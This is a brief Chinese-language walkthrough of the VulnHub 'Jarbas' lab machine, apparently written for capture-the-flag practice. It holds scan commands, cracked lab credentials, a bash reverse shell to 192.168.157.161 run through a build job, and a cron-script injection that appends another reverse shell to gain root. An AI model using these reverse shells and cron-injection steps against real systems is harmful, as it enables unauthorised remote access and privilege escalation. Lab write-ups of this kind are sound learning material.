vulnhub - Jarbas
資訊收集
sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.157.176
sudo nmap -script=vuln -p22,80,3306,8080 192.168.157.176
有robots.txt
# we don't want robots to click "build" links
8080是後臺登入
目錄掃描
掃一下目錄(不指定-x php,html的話沒掃到)
sudo gobuster dir -u http://192.168.157.176 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html
有/access.html
解完md5得到三個使用者及密碼
tiago:italia99
trindade:marianna
eder:vipsu
其中eder:vipsu可以登入8080的後臺
登入CMS反彈shell
建立專案後翻找可以執行命令的地方
直接彈shell
/bin/bash -i >& /dev/tcp/192.168.157.161/9999 0>&1
儲存後構建即可
沒有許可權
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
crontab提權
檢視系統定時任務: cat /etc/crontab
發現了一個每五分鐘定期執行的sh指令碼CleaningScript.sh
將反彈Shell的命令寫入指令碼檔案
echo "/bin/bash -i >& /dev/tcp/192.168.157.161/7777 0>&1" >> /etc/script/CleaningScript.sh
等shell就好了
